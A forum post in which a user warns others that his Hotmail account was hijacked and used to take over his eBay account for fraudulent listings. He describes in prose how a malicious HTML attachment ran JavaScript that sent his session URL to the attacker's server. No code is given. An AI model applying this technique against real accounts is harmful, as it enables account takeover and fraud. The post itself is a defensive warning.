Guys, be careful with those hotmail accounts.

funks

Golden Member
Nov 9, 2000
1,402
44
91
Some guy hijacked my hotmail account.. He then used it to reset my password at eBay (which was then sent to my hotmail account) then started listing a bunch of items (telling people to send him payment at Romania)..

I'm lucky that one of the bidders actually called me on the phone and let me know.. I was able to minimize the damage but two did get through..

Here's my theory of operation on how he hijacked my Hotmail account..

1) He sent me an e-mail with an "html" attachment (yes, HTML) ( I viewed it using Outlook Express - latest version with all updates)
2) The person then sends me another e-mail, asking if I opened the attachment.
3) Note that when one clicks on an attachment using Outlook Express (from hotmail), it opens up a browser window to hotmail so that one can view the attachment.
4) His god darned HTML attachment is not without a malicious payload - It has JavaScript that runs (while I'm on hotmail) due to <IMG> tags
5) He used the URL within the javascript as a HTTP request parameter directed to one of his servers.

The rest, you already know..

I will be filing a security report with Hotmail report tommorow, along with Microsoft to detail my findings..
Such a simple method too :( I guess we need to be carefull even when opening up HTML attachments.

George